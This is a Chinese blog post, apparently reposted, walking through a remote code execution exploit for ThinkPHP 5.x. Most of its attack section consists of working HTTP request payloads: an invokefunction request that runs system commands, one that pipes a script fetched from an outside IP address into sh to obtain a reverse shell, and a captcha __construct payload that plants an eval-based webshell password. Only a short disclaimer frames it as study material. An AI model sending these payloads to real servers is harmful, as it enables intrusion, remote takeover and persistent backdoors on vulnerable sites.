Thinkphp5.x反序列化漏洞复现
Posted 星球守护者
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Thinkphp5.x反序列化漏洞复现相关的知识,希望对你有一定的参考价值。
介绍
-
Thinkphp是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。
-
最早诞生于2006年初,2007年元旦正式更名为ThinkPHP,并且遵循Apache2开源协议发布。
-
ThinkPHP是为了简化企业级应用开发和敏捷WEB应用开发而诞生的。
影响版本
-
ThinkPHP 5.0.x (<=5.0.23)
-
ThinkPHP5.x < (5.1.31)
实验环境
漏洞复现一(工具)
第一步 漏洞检测
第二步 执行命令
漏洞复现二(反弹shell)
GET /index.php?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l HTTP/1.1 Host: 1.14.65.168:8077 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (Khtml, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
GET //?s=/index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=curl%2049.233.33.115|sh HTTP/1.1 Host: 1.14.65.168:8077 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close |
漏洞复现三 (连接)
漏洞点:
POST /index.php?s=captcha&_method=__construct&method=get&filter[]=system&get[]=ipconfig
url /?s=captcha 密码: body下添加键值 _method=__construct filter[]=assert method=get get[]=eval($_POST['密码']); |
免责声明
`本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!`
以上是关于Thinkphp5.x反序列化漏洞复现的主要内容,如果未能解决你的问题,请参考以下文章